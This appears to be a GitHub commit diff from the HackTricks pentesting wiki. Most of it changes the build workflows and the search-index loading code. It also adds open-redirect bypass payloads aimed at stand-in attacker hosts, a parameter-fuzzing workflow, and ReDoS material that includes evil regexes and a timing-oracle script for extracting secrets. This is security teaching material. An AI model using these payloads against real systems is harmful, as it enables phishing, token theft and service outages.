mirror of https://github.com/HackTricks-wiki/hacktricks.git
synced 2025-10-10 18:36:50 +00:00

Merge branch 'master' into update_Q3_2025_s_most_exploited_WordPress_vulnerabilities_20251001_123959

This commit is contained in: commit 971befe517

106 .github/workflows/build_master.yml (vendored)
@@ -43,7 +43,7 @@ jobs:
          && sudo apt update \
          && sudo apt install gh -y

-     - name: Publish search index release asset
+     - name: Push search index to hacktricks-searchindex repo
        shell: bash
        env:
          PAT_TOKEN: ${{ secrets.PAT_TOKEN }}
@@ -51,43 +51,99 @@ jobs:
          set -euo pipefail

          ASSET="book/searchindex.js"
-         TAG="searchindex-en"
-         TITLE="Search Index (en)"
+         TARGET_REPO="HackTricks-wiki/hacktricks-searchindex"
+         FILENAME="searchindex-en.js"

          if [ ! -f "$ASSET" ]; then
            echo "Expected $ASSET to exist after build" >&2
            exit 1
          fi

-         TOKEN="${PAT_TOKEN:-${GITHUB_TOKEN:-}}"
+         TOKEN="${PAT_TOKEN}"
          if [ -z "$TOKEN" ]; then
-           echo "No token available for GitHub CLI" >&2
+           echo "No PAT_TOKEN available" >&2
            exit 1
          fi
          export GH_TOKEN="$TOKEN"

-         # Delete the release if it exists
-         echo "Checking if release $TAG exists..."
-         if gh release view "$TAG" --repo "$GITHUB_REPOSITORY" >/dev/null 2>&1; then
-           echo "Release $TAG already exists, deleting it..."
-           gh release delete "$TAG" --yes --repo "$GITHUB_REPOSITORY" --cleanup-tag || {
-             echo "Failed to delete release, trying without cleanup-tag..."
-             gh release delete "$TAG" --yes --repo "$GITHUB_REPOSITORY" || {
-               echo "Warning: Could not delete existing release, will try to recreate..."
-             }
-           }
-           sleep 2 # Give GitHub API a moment to process the deletion
+         # Clone the searchindex repo
+         git clone https://x-access-token:${TOKEN}@github.com/${TARGET_REPO}.git /tmp/searchindex-repo
+
+         cd /tmp/searchindex-repo
+         git config user.name "GitHub Actions"
+         git config user.email "github-actions@github.com"
+
+         # Compress the searchindex file
+         cd "${GITHUB_WORKSPACE}"
+         gzip -9 -k -f "$ASSET"
+
+         # Show compression stats
+         ORIGINAL_SIZE=$(wc -c < "$ASSET")
+         COMPRESSED_SIZE=$(wc -c < "${ASSET}.gz")
+         RATIO=$(awk "BEGIN {printf \"%.1f\", ($COMPRESSED_SIZE / $ORIGINAL_SIZE) * 100}")
+         echo "Compression: ${ORIGINAL_SIZE} bytes -> ${COMPRESSED_SIZE} bytes (${RATIO}%)"
+
+         # Copy the .gz version to the searchindex repo
+         cd /tmp/searchindex-repo
+         cp "${GITHUB_WORKSPACE}/${ASSET}.gz" "${FILENAME}.gz"
+
+         # Stage the updated file
+         git add "${FILENAME}.gz"
+
+         # Commit and push with retry logic
+         if git diff --staged --quiet; then
+           echo "No changes to commit"
+         else
-           echo "Release $TAG does not exist, proceeding with creation..."
+           TIMESTAMP=$(date -u +"%Y-%m-%d %H:%M:%S UTC")
+           git commit -m "Update searchindex files - ${TIMESTAMP}"
+
+           # Retry push up to 20 times with pull --rebase between attempts
+           MAX_RETRIES=20
+           RETRY_COUNT=0
+           while [ $RETRY_COUNT -lt $MAX_RETRIES ]; do
+             if git push origin master; then
+               echo "Successfully pushed on attempt $((RETRY_COUNT + 1))"
+               break
+             else
+               RETRY_COUNT=$((RETRY_COUNT + 1))
+               if [ $RETRY_COUNT -lt $MAX_RETRIES ]; then
+                 echo "Push failed, attempt $RETRY_COUNT/$MAX_RETRIES. Pulling and retrying..."
+
+                 # Try normal rebase first
+                 if git pull --rebase origin master 2>&1 | tee /tmp/pull_output.txt; then
+                   echo "Rebase successful, retrying push..."
+                 else
+                   # If rebase fails due to divergent histories (orphan branch reset), re-clone
+                   if grep -q "unrelated histories\|refusing to merge\|fatal: invalid upstream\|couldn't find remote ref" /tmp/pull_output.txt; then
+                     echo "Detected history rewrite, re-cloning repository..."
+                     cd /tmp
+                     rm -rf searchindex-repo
+                     git clone https://x-access-token:${TOKEN}@github.com/${TARGET_REPO}.git searchindex-repo
+                     cd searchindex-repo
+                     git config user.name "GitHub Actions"
+                     git config user.email "github-actions@github.com"
+
+                     # Re-copy the .gz version
+                     cp "${GITHUB_WORKSPACE}/${ASSET}.gz" "${FILENAME}.gz"
+
+                     git add "${FILENAME}.gz"
+                     TIMESTAMP=$(date -u +"%Y-%m-%d %H:%M:%S UTC")
+                     git commit -m "Update searchindex files - ${TIMESTAMP}"
+                     echo "Re-cloned and re-committed, will retry push..."
+                   else
+                     echo "Rebase failed for unknown reason, retrying anyway..."
+                   fi
+                 fi
+
-         # Create new release (with force flag to overwrite if deletion failed)
-         gh release create "$TAG" "$ASSET" --title "$TITLE" --notes "Automated search index build for master" --repo "$GITHUB_REPOSITORY" || {
-           echo "Failed to create release, trying with force flag..."
-           gh release delete "$TAG" --yes --repo "$GITHUB_REPOSITORY" --cleanup-tag >/dev/null 2>&1 || true
-           sleep 2
-           gh release create "$TAG" "$ASSET" --title "$TITLE" --notes "Automated search index build for master" --repo "$GITHUB_REPOSITORY"
-         }
-         sleep 1
+               else
+                 echo "Failed to push after $MAX_RETRIES attempts"
+                 exit 1
+               fi
+             fi
+           done
+         fi
+
+         echo "Successfully pushed searchindex files"


          # Login in AWs

88 .github/workflows/translate_all.yml (vendored)
@@ -129,7 +129,7 @@ jobs:
          git pull
          MDBOOK_BOOK__LANGUAGE=$BRANCH mdbook build || (echo "Error logs" && cat hacktricks-preprocessor-error.log && echo "" && echo "" && echo "Debug logs" && (cat hacktricks-preprocessor.log | tail -n 20) && exit 1)

-     - name: Publish search index release asset
+     - name: Push search index to hacktricks-searchindex repo
        shell: bash
        env:
          PAT_TOKEN: ${{ secrets.PAT_TOKEN }}
@@ -137,31 +137,93 @@ jobs:
          set -euo pipefail

          ASSET="book/searchindex.js"
-         TAG="searchindex-${BRANCH}"
-         TITLE="Search Index (${BRANCH})"
+         TARGET_REPO="HackTricks-wiki/hacktricks-searchindex"
+         FILENAME="searchindex-${BRANCH}.js"

          if [ ! -f "$ASSET" ]; then
            echo "Expected $ASSET to exist after build" >&2
            exit 1
          fi

-         TOKEN="${PAT_TOKEN:-${GITHUB_TOKEN:-}}"
+         TOKEN="${PAT_TOKEN}"
          if [ -z "$TOKEN" ]; then
-           echo "No token available for GitHub CLI" >&2
+           echo "No PAT_TOKEN available" >&2
            exit 1
          fi
          export GH_TOKEN="$TOKEN"

-         # Delete the release if it exists
-         if gh release view "$TAG" >/dev/null 2>&1; then
-           echo "Release $TAG already exists, deleting it..."
-           gh release delete "$TAG" --yes --repo "$GITHUB_REPOSITORY"
+         # Clone the searchindex repo
+         git clone https://x-access-token:${TOKEN}@github.com/${TARGET_REPO}.git /tmp/searchindex-repo
+
+         # Compress the searchindex file
+         gzip -9 -k -f "$ASSET"
+
+         # Show compression stats
+         ORIGINAL_SIZE=$(wc -c < "$ASSET")
+         COMPRESSED_SIZE=$(wc -c < "${ASSET}.gz")
+         RATIO=$(awk "BEGIN {printf \"%.1f\", ($COMPRESSED_SIZE / $ORIGINAL_SIZE) * 100}")
+         echo "Compression: ${ORIGINAL_SIZE} bytes -> ${COMPRESSED_SIZE} bytes (${RATIO}%)"
+
+         # Copy ONLY the .gz version to the searchindex repo (no uncompressed .js)
+         cp "${ASSET}.gz" "/tmp/searchindex-repo/${FILENAME}.gz"
+
+         # Commit and push with retry logic
+         cd /tmp/searchindex-repo
+         git config user.name "GitHub Actions"
+         git config user.email "github-actions@github.com"
+         git add "${FILENAME}.gz"
+
+         if git diff --staged --quiet; then
+           echo "No changes to commit"
+         else
+           git commit -m "Update ${FILENAME} from hacktricks-cloud build"
+
+           # Retry push up to 20 times with pull --rebase between attempts
+           MAX_RETRIES=20
+           RETRY_COUNT=0
+           while [ $RETRY_COUNT -lt $MAX_RETRIES ]; do
+             if git push origin master; then
+               echo "Successfully pushed on attempt $((RETRY_COUNT + 1))"
+               break
+             else
+               RETRY_COUNT=$((RETRY_COUNT + 1))
+               if [ $RETRY_COUNT -lt $MAX_RETRIES ]; then
+                 echo "Push failed, attempt $RETRY_COUNT/$MAX_RETRIES. Pulling and retrying..."
+
+                 # Try normal rebase first
+                 if git pull --rebase origin master 2>&1 | tee /tmp/pull_output.txt; then
+                   echo "Rebase successful, retrying push..."
+                 else
+                   # If rebase fails due to divergent histories (orphan branch reset), re-clone
+                   if grep -q "unrelated histories\|refusing to merge\|fatal: invalid upstream\|couldn't find remote ref" /tmp/pull_output.txt; then
+                     echo "Detected history rewrite, re-cloning repository..."
+                     cd /tmp
+                     rm -rf searchindex-repo
+                     git clone https://x-access-token:${TOKEN}@github.com/${TARGET_REPO}.git searchindex-repo
+                     cd searchindex-repo
+                     git config user.name "GitHub Actions"
+                     git config user.email "github-actions@github.com"
+
+                     # Re-copy ONLY the .gz version (no uncompressed .js)
+                     cp "${ASSET}.gz" "${FILENAME}.gz"
+
+                     git add "${FILENAME}.gz"
+                     git commit -m "Update ${FILENAME}.gz from hacktricks-cloud build"
+                     echo "Re-cloned and re-committed, will retry push..."
+                   else
+                     echo "Rebase failed for unknown reason, retrying anyway..."
+                   fi
+                 fi
+
-         # Create new release
-         gh release create "$TAG" "$ASSET" --title "$TITLE" --notes "Automated search index build for $BRANCH" --repo "$GITHUB_REPOSITORY"
-         sleep 1
+               else
+                 echo "Failed to push after $MAX_RETRIES attempts"
+                 exit 1
+               fi
+             fi
+           done
+         fi

-         # Login in AWs
+         # Login in AWS

      - name: Configure AWS credentials using OIDC
        uses: aws-actions/configure-aws-credentials@v3
        with:

@@ -7,12 +7,23 @@

### Redirect to localhost or arbitrary domains

- If the app “allows only internal/whitelisted hosts”, try alternative host notations to hit loopback or internal ranges via the redirect target:
  - IPv4 loopback variants: 127.0.0.1, 127.1, 2130706433 (decimal), 0x7f000001 (hex), 017700000001 (octal)
  - IPv6 loopback variants: [::1], [0:0:0:0:0:0:0:1], [::ffff:127.0.0.1]
  - Trailing dot and casing: localhost., LOCALHOST, 127.0.0.1.
  - Wildcard DNS that resolves to loopback: lvh.me, sslip.io (e.g., 127.0.0.1.sslip.io), traefik.me, localtest.me. These are useful when only “subdomains of X” are allowed but host resolution still points to 127.0.0.1.
- Network-path references often bypass naive validators that prepend a scheme or only check prefixes:
  - //attacker.tld → interpreted as scheme-relative and navigates off-site with the current scheme.
- Userinfo tricks defeat contains/startswith checks against trusted hosts:
  - https://trusted.tld@attacker.tld/ → browser navigates to attacker.tld but simple string checks “see” trusted.tld.
- Backslash parsing confusion between frameworks/browsers (see the parser-mismatch sketch after this list):
  - https://trusted.tld\@attacker.tld → some backends treat “\” as a path char and pass validation; browsers normalize to “/” and interpret trusted.tld as userinfo, sending users to attacker.tld. This also appears in Node/PHP URL-parser mismatches.
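
The mismatch is easy to demonstrate locally. A minimal sketch (the `naive_check` validator and the domains are hypothetical, purely illustrative) of why raw string checks diverge from what a URL parser, and a browser, will actually resolve:

```python
from urllib.parse import urlparse

TRUSTED = "trusted.tld"

def naive_check(url: str) -> bool:
    # Flawed validation seen in the wild: prefix/substring tests on the raw string
    return url.startswith("https://" + TRUSTED)

for url in (
    f"https://{TRUSTED}@attacker.tld/",    # userinfo trick
    f"https://{TRUSTED}\\@attacker.tld/",  # backslash confusion
    f"https://{TRUSTED}.attacker.tld/",    # prefix-matching flaw
):
    # naive_check passes, yet the parsed hostname is attacker-controlled
    print(f"{url:45} naive_check={naive_check(url)} actual_host={urlparse(url).hostname}")
```

Any payload that passes the validator while `actual_host` is attacker-controlled is a working bypass candidate against that class of validator.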

{{#ref}}
ssrf-server-side-request-forgery/url-format-bypass.md
{{#endref}}

### Modern open-redirect to XSS pivots

```bash
#Basic payload, javascript code is executed after "javascript:"

@@ -60,6 +71,34 @@ javascript://whitelisted.com?%a0alert%281%29

";alert(0);//
```

<details>
<summary>More modern URL-based bypass payloads</summary>

```text
# Scheme-relative (current scheme is reused)
//evil.example

# Credentials (userinfo) trick
https://trusted.example@evil.example/

# Backslash confusion (server validates, browser normalizes)
https://trusted.example\@evil.example/

# Schemeless with whitespace/control chars
evil.example%00
%09//evil.example

# Prefix/suffix matching flaws
https://trusted.example.evil.example/
https://evil.example/trusted.example

# When only path is accepted, try breaking absolute URL detection
/\\evil.example
/..//evil.example
```

</details>

## Open Redirect uploading svg files

```html
@@ -173,18 +212,78 @@ exit;
?>
```

## Hunting and exploitation workflow (practical)

- Single URL check with curl:

```bash
curl -s -I "https://target.tld/redirect?url=//evil.example" | grep -i "^Location:"
```

- Discover and fuzz likely parameters at scale:

<details>
<summary>Click to expand</summary>

```bash
# 1) Gather historical URLs, keep those with common redirect params
cat domains.txt \
  | gau --o urls.txt # or: waybackurls / katana / hakrawler

# 2) Grep common parameters and normalize list
rg -NI "(url=|next=|redir=|redirect|dest=|rurl=|return=|continue=)" urls.txt \
  | sed 's/\r$//' | sort -u > candidates.txt

# 3) Use OpenRedireX to fuzz with payload corpus
cat candidates.txt | openredirex -p payloads.txt -k FUZZ -c 50 > results.txt

# 4) Manually verify interesting hits
awk '/30[1237]|Location:/I' results.txt
```

</details>

- Don’t forget client-side sinks in SPAs: look for window.location/assign/replace and framework helpers that read query/hash and redirect; a quick triage script follows.
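
Something like this (the sink/source regexes are hypothetical starting points, tune per framework) flags lines where a redirect sink and an attacker-readable source meet in the same statement:

```python
import re, sys, pathlib

# Hypothetical patterns: common redirect sinks and user-controlled URL sources
SINK   = re.compile(r"location\s*(=|\.assign\(|\.replace\()|window\.open\(|router\.(push|replace)\(")
SOURCE = re.compile(r"location\.(search|hash)|URLSearchParams|document\.referrer")

root = pathlib.Path(sys.argv[1] if len(sys.argv) > 1 else ".")
for path in root.rglob("*.js"):
    for i, line in enumerate(path.read_text(errors="ignore").splitlines(), 1):
        if SINK.search(line) and SOURCE.search(line):
            print(f"{path}:{i}: {line.strip()}")
```

Hits are only leads; confirm each one by tracing whether the source value actually reaches the sink unvalidated.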

- Frameworks often introduce footguns when redirect destinations are derived from untrusted input (query params, Referer, cookies). See the Next.js notes about redirects and avoid dynamic destinations derived from user input.

{{#ref}}
../network-services-pentesting/pentesting-web/nextjs.md
{{#endref}}

- OAuth/OIDC flows: abusing open redirectors frequently escalates to account takeover by leaking authorization codes/tokens. See the dedicated guide:

{{#ref}}
./oauth-to-account-takeover.md
{{#endref}}

- Server responses that implement redirects without Location (meta refresh/JavaScript) are still exploitable for phishing and can sometimes be chained. Grep for:

```html
<meta http-equiv="refresh" content="0;url=//evil.example">
<script>location = new URLSearchParams(location.search).get('next')</script>
```

## Tools

- [https://github.com/0xNanda/Oralyzer](https://github.com/0xNanda/Oralyzer)
- OpenRedireX – fuzzer for detecting open redirects. Example:

```bash
# Install
git clone https://github.com/devanshbatham/OpenRedireX && cd OpenRedireX && ./setup.sh

# Fuzz a list of candidate URLs (use FUZZ as placeholder)
cat list_of_urls.txt | ./openredirex.py -p payloads.txt -k FUZZ -c 50
```

## References

- In [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Open Redirect](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Open%20Redirect) you can find fuzzing lists.
- [https://pentester.land/cheatsheets/2018/11/02/open-redirect-cheatsheet.html](https://pentester.land/cheatsheets/2018/11/02/open-redirect-cheatsheet.html)
- [https://github.com/cujanovic/Open-Redirect-Payloads](https://github.com/cujanovic/Open-Redirect-Payloads)
- [https://infosecwriteups.com/open-redirects-bypassing-csrf-validations-simplified-4215dc4f180a](https://infosecwriteups.com/open-redirects-bypassing-csrf-validations-simplified-4215dc4f180a)
- PortSwigger Web Security Academy – DOM-based open redirection: [https://portswigger.net/web-security/dom-based/open-redirection](https://portswigger.net/web-security/dom-based/open-redirection)
- OpenRedireX – A fuzzer for detecting open redirect vulnerabilities: [https://github.com/devanshbatham/OpenRedireX](https://github.com/devanshbatham/OpenRedireX)

{{#include ../banners/hacktricks-training.md}}

@@ -8,7 +8,12 @@ A **Regular Expression Denial of Service (ReDoS)** happens when someone takes ad

## The Problematic Regex Naïve Algorithm

**Check the details in [https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS](https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS)**

### Engine behavior and exploitability

- Most popular engines (PCRE, Java `java.util.regex`, Python `re`, JavaScript `RegExp`) use a **backtracking** VM. Crafted inputs that create many overlapping ways to match a subpattern force exponential or high-polynomial backtracking.
- Some engines/libraries are designed to be **ReDoS-resilient** by construction (no backtracking), e.g. **RE2** and ports based on finite automata that provide worst‑case linear time; using them for untrusted input removes the backtracking DoS primitive. See the references at the end for details, and the timing sketch after this list.
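
A quick way to confirm which kind of engine you are facing is to time the same evil pattern on both. A rough sketch, assuming an RE2 Python binding is available (`pip install google-re2`, imported as `re2`, is an assumption; any RE2 port behaves the same way):

```python
import re, time

payload = 'a' * 22 + '!'   # long ambiguous run + failing tail

t0 = time.perf_counter()
re.search(r'(a+)+$', payload)      # stdlib backtracking engine: seconds, roughly doubling per extra 'a'
print(f"re : {time.perf_counter() - t0:.3f}s")

try:
    import re2                     # assumed RE2 binding; finite-automaton, linear time
    t0 = time.perf_counter()
    re2.search(r'(a+)+$', payload)
    print(f"re2: {time.perf_counter() - t0:.6f}s")
except ImportError:
    print("no RE2 binding installed; only the backtracking timing is shown")
```

On a backtracking engine each extra `a` roughly doubles the runtime; a linear-time engine stays flat no matter how long the run gets.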

## Evil Regexes <a href="#evil-regexes" id="evil-regexes"></a>

@@ -18,10 +23,36 @@ An evil regular expression pattern is that one that can **get stuck on crafted i

- ([a-zA-Z]+)*
- (a|aa)+
- (a|a?)+
- (.*a){x} for x > 10

All those are vulnerable to the input `aaaaaaaaaaaaaaaaaaaaaaaa!`.

### Practical recipe to build PoCs

Most catastrophic cases follow this shape:

- Prefix that gets you into the vulnerable subpattern (optional).
- Long run of a character that causes ambiguous matches inside nested/overlapping quantifiers (e.g., many `a`, `_`, or spaces).
- A final character that forces overall failure so the engine must backtrack through all possibilities (often a character that won’t match the last token, like `!`).

Minimal examples:

- `(a+)+$` vs input `"a"*N + "!"`
- `\w*_*\w*$` vs input `"v" + "_"*N + "!"`

Increase N and observe super‑linear growth.

#### Quick timing harness (Python)

```python
import re, time
pat = re.compile(r'(\w*_)\w*$')
for n in [2**k for k in range(8, 15)]:
    s = 'v' + '_'*n + '!'
    t0=time.time(); pat.search(s); dt=time.time()-t0
    print(n, f"{dt:.3f}s")
```

## ReDoS Payloads

### String Exfiltration via ReDoS

@@ -30,7 +61,7 @@ In a CTF (or bug bounty) maybe you **control the Regex a sensitive information (

- In [**this post**](https://portswigger.net/daily-swig/blind-regex-injection-theoretical-exploit-offers-new-way-to-force-web-apps-to-spill-secrets) you can find this ReDoS rule: `^(?=<flag>)((.*)*)*salt$`
  - Example: `^(?=HTB{sOmE_fl§N§)((.*)*)*salt$`
- In [**this writeup**](https://github.com/jorgectf/Created-CTF-Challenges/blob/main/challenges/TacoMaker%20@%20DEKRA%20CTF%202022/solver/solver.html) you can find this one: `<flag>(((((((.*)*)*)*)*)*)*)!`
- In [**this writeup**](https://ctftime.org/writeup/25869) he used: `^(?=${flag_prefix}).*.*.*.*.*.*.*.*!!!!$` (a shortened variant is simulated in the sketch below)
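
A minimal local simulation of the timing oracle behind those rules. Everything here is illustrative and needs tuning per target: the flag value, the shortened 6-star evil core, and the 0.01 s threshold are assumptions, and in a real attack `probe` would submit the regex to the vulnerable endpoint instead of calling `re.search` locally:

```python
import re, string, time

SECRET = "HTB{" + "a" * 34 + "}"   # stand-in for the server-side secret

def probe(prefix: str) -> float:
    # Blind-regex-injection rule: the evil suffix only explodes when the lookahead matches
    evil = "^(?=" + re.escape(prefix) + ").*.*.*.*.*.*!!!!$"
    t0 = time.perf_counter()
    re.search(evil, SECRET)        # in reality: one request to the target
    return time.perf_counter() - t0

known = "HTB{"
while not known.endswith("}"):
    for c in string.ascii_letters + string.digits + "_{}":
        if probe(known + c) > 0.01:   # slow answer => the guessed prefix matched
            known += c
            break
    else:
        break                         # no candidate extended the prefix; give up
print("recovered:", known)             # takes a minute or two as written
```

Wrong guesses fail the lookahead instantly; correct guesses force the engine through the ambiguous `.*` chain, so each character of the secret leaks as a timing spike.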

### ReDoS Controlling Input and Regex

@@ -67,19 +98,35 @@ Regexp (a+)*$ took 723 milliseconds.
*/
```

### Language/engine notes for attackers

- JavaScript (browser/Node): Built‑in `RegExp` is a backtracking engine and commonly exploitable when regex+input are attacker‑influenced.
- Python: `re` is backtracking. Long ambiguous runs plus a failing tail often yield catastrophic backtracking.
- Java: `java.util.regex` is backtracking. If you only control input, look for endpoints using complex validators; if you control patterns (e.g., stored rules), ReDoS is usually trivial.
- Engines such as **RE2/RE2J/RE2JS** or the **Rust regex** crate are designed to avoid catastrophic backtracking. If you hit these, focus on other bottlenecks (e.g., enormous patterns) or find components still using backtracking engines.

## Tools

- [https://github.com/doyensec/regexploit](https://github.com/doyensec/regexploit)
  - Find vulnerable regexes and auto‑generate evil inputs. Examples:
    - `pip install regexploit`
    - Analyze one pattern interactively: `regexploit`
    - Scan Python/JS code for regexes: `regexploit-py path/` and `regexploit-js path/`
- [https://devina.io/redos-checker](https://devina.io/redos-checker)
- [https://github.com/davisjam/vuln-regex-detector](https://github.com/davisjam/vuln-regex-detector)
  - End‑to‑end pipeline to extract regexes from a project, detect vulnerable ones, and validate PoCs in the target language. Useful for hunting through large codebases.
- [https://github.com/tjenkinson/redos-detector](https://github.com/tjenkinson/redos-detector)
  - Simple CLI/JS library that reasons about backtracking to report if a pattern is safe.

> Tip: When you only control input, generate strings with doubling lengths (e.g., 2^k characters) and track latency. Exponential growth strongly indicates a viable ReDoS.

## References

- [https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS](https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS)
- [https://portswigger.net/daily-swig/blind-regex-injection-theoretical-exploit-offers-new-way-to-force-web-apps-to-spill-secrets](https://portswigger.net/daily-swig/blind-regex-injection-theoretical-exploit-offers-new-way-to-force-web-apps-to-spill-secrets)
- [https://github.com/jorgectf/Created-CTF-Challenges/blob/main/challenges/TacoMaker%20@%20DEKRA%20CTF%202022/solver/solver.html](https://github.com/jorgectf/Created-CTF-Challenges/blob/main/challenges/TacoMaker%20@%20DEKRA%20CTF%202022/solver/solver.html)
- [https://ctftime.org/writeup/25869](https://ctftime.org/writeup/25869)
- SoK (2024): A Literature and Engineering Review of Regular Expression Denial of Service (ReDoS) — [https://arxiv.org/abs/2406.11618](https://arxiv.org/abs/2406.11618)
- Why RE2 (linear‑time regex engine) — [https://github.com/google/re2/wiki/WhyRE2](https://github.com/google/re2/wiki/WhyRE2)

{{#include ../banners/hacktricks-training.md}}

@@ -48,7 +48,7 @@ Yes, you can, but **don't forget to mention the specific link(s)** where the con

> [!TIP]
>
> - **How can I reference a page of HackTricks?**

As long as the link **of** the page(s) where you took the information from appears, it's enough.\
If you need a bibtex you can use something like:

@@ -21,19 +21,48 @@
  try { importScripts('https://cdn.jsdelivr.net/npm/elasticlunr@0.9.5/elasticlunr.min.js'); }
  catch { importScripts(abs('/elasticlunr.min.js')); }

- /* 2 — load a single index (remote → local) */
+ /* 2 — decompress gzip data */
+ async function decompressGzip(arrayBuffer){
+   if(typeof DecompressionStream !== 'undefined'){
+     /* Modern browsers: use native DecompressionStream */
+     const stream = new Response(arrayBuffer).body.pipeThrough(new DecompressionStream('gzip'));
+     const decompressed = await new Response(stream).arrayBuffer();
+     return new TextDecoder().decode(decompressed);
+   } else {
+     /* Fallback: use pako library */
+     if(typeof pako === 'undefined'){
+       try { importScripts('https://cdn.jsdelivr.net/npm/pako@2.1.0/dist/pako.min.js'); }
+       catch(e){ throw new Error('pako library required for decompression: '+e); }
+     }
+     const uint8Array = new Uint8Array(arrayBuffer);
+     const decompressed = pako.ungzip(uint8Array, {to: 'string'});
+     return decompressed;
+   }
+ }
+
+ /* 3 — load a single index (remote → local) */
  async function loadIndex(remote, local, isCloud=false){
    let rawLoaded = false;
    if(remote){
+     /* Try ONLY compressed version from GitHub (remote already includes .js.gz) */
      try {
        const r = await fetch(remote,{mode:'cors'});
-       if (!r.ok) throw new Error('HTTP '+r.status);
-       importScripts(URL.createObjectURL(new Blob([await r.text()],{type:'application/javascript'})));
+       if (r.ok) {
+         const compressed = await r.arrayBuffer();
+         const text = await decompressGzip(compressed);
+         importScripts(URL.createObjectURL(new Blob([text],{type:'application/javascript'})));
          rawLoaded = true;
-     } catch(e){ console.warn('remote',remote,'failed →',e); }
+         console.log('Loaded compressed from GitHub:',remote);
+       }
+     } catch(e){ console.warn('compressed GitHub',remote,'failed →',e); }
    }
+   /* If remote (GitHub) failed, fall back to local uncompressed file */
    if(!rawLoaded && local){
-     try { importScripts(abs(local)); rawLoaded = true; }
+     try {
+       importScripts(abs(local));
+       rawLoaded = true;
+       console.log('Loaded local fallback:',local);
+     }
      catch(e){ console.error('local',local,'failed →',e); }
    }
    if(!rawLoaded) return null; /* give up on this index */
@@ -62,26 +91,28 @@
    return local ? loadIndex(null, local, isCloud) : null;
  }

- (async () => {
-   const htmlLang = (document.documentElement.lang || 'en').toLowerCase();
-   const lang = htmlLang.split('-')[0];
-   const mainReleaseBase = 'https://github.com/HackTricks-wiki/hacktricks/releases/download';
-   const cloudReleaseBase = 'https://github.com/HackTricks-wiki/hacktricks-cloud/releases/download';
+ let built = [];
+ const MAX = 30, opts = {bool:'AND', expand:true};

-   const mainTags = Array.from(new Set([\`searchindex-\${lang}\`, 'searchindex-en', 'searchindex-master']));
-   const cloudTags = Array.from(new Set([\`searchindex-\${lang}\`, 'searchindex-en', 'searchindex-master']));
+ self.onmessage = async ({data}) => {
+   if(data.type === 'init'){
+     const lang = data.lang || 'en';
+     const searchindexBase = 'https://raw.githubusercontent.com/HackTricks-wiki/hacktricks-searchindex/master';

-   const MAIN_REMOTE_SOURCES = mainTags.map(tag => \`\${mainReleaseBase}/\${tag}/searchindex.js\`);
-   const CLOUD_REMOTE_SOURCES = cloudTags.map(tag => \`\${cloudReleaseBase}/\${tag}/searchindex.js\`);
+     /* Remote sources are .js.gz (compressed), local fallback is .js (uncompressed) */
+     const mainFilenames = Array.from(new Set(['searchindex-' + lang + '.js.gz', 'searchindex-en.js.gz']));
+     const cloudFilenames = Array.from(new Set(['searchindex-cloud-' + lang + '.js.gz', 'searchindex-cloud-en.js.gz']));
+
+     const MAIN_REMOTE_SOURCES = mainFilenames.map(function(filename) { return searchindexBase + '/' + filename; });
+     const CLOUD_REMOTE_SOURCES = cloudFilenames.map(function(filename) { return searchindexBase + '/' + filename; });

      const indices = [];
-   const main = await loadWithFallback(MAIN_REMOTE_SOURCES , '/searchindex.js', false); if(main) indices.push(main);
-   const cloud= await loadWithFallback(CLOUD_REMOTE_SOURCES, '/searchindex-cloud.js', true ); if(cloud) indices.push(cloud);
+     const main = await loadWithFallback(MAIN_REMOTE_SOURCES , '/searchindex-book.js', false); if(main) indices.push(main);
+     const cloud= await loadWithFallback(CLOUD_REMOTE_SOURCES, '/searchindex.js', true ); if(cloud) indices.push(cloud);
      if(!indices.length){ postMessage({ready:false, error:'no-index'}); return; }

      /* build index objects */
-     const built = indices.map(d => ({
+     built = indices.map(d => ({
        idx : elasticlunr.Index.load(d.json),
        urls: d.urls,
        cloud: d.cloud,
@@ -89,9 +120,10 @@
      }));

      postMessage({ready:true});
-   const MAX = 30, opts = {bool:'AND', expand:true};
+     return;
+   }

- self.onmessage = ({data:q}) => {
+   const q = data.query || data;
    if(!q){ postMessage([]); return; }

    const all = [];
@@ -114,12 +146,16 @@
    all.sort((a,b)=>b.norm-a.norm);
    postMessage(all.slice(0,MAX));
  };
- })();
`;

/* ───────────── 2. spawn worker ───────────── */
const worker = new Worker(URL.createObjectURL(new Blob([workerCode],{type:'application/javascript'})));

+/* ───────────── 2.1. initialize worker with language ───────────── */
+const htmlLang = (document.documentElement.lang || 'en').toLowerCase();
+const lang = htmlLang.split('-')[0];
+worker.postMessage({type: 'init', lang: lang});

/* ───────────── 3. DOM refs ─────────────── */
const wrap = document.getElementById('search-wrapper');
const bar = document.getElementById('searchbar');
@@ -133,6 +169,7 @@
icon.setAttribute('aria-label','Loading search …');
icon.setAttribute('title','Search is loading, please wait...');

const HOT=83, ESC=27, DOWN=40, UP=38, ENTER=13;
let debounce, teaserCount=0;
@@ -184,7 +221,7 @@
else if([DOWN,UP,ENTER].includes(e.keyCode) && document.activeElement!==bar){const cur=list.querySelector('li.focus'); if(!cur) return; e.preventDefault(); if(e.keyCode===DOWN){const nxt=cur.nextElementSibling; if(nxt){cur.classList.remove('focus'); nxt.classList.add('focus');}} else if(e.keyCode===UP){const prv=cur.previousElementSibling; cur.classList.remove('focus'); if(prv){prv.classList.add('focus');} else {bar.focus();}} else {const a=cur.querySelector('a'); if(a) window.location.assign(a.href);}}
});

-bar.addEventListener('input',e=>{ clearTimeout(debounce); debounce=setTimeout(()=>worker.postMessage(e.target.value.trim()),120); });
+bar.addEventListener('input',e=>{ clearTimeout(debounce); debounce=setTimeout(()=>worker.postMessage({query: e.target.value.trim()}),120); });

/* ───────────── worker messages ───────────── */
worker.onmessage = ({data}) => {
@@ -207,5 +244,5 @@
docs.forEach(d=>{const li=document.createElement('li'); li.innerHTML=format(d,terms); list.appendChild(li);});
listOut.classList.toggle('hidden',!docs.length);
};
})();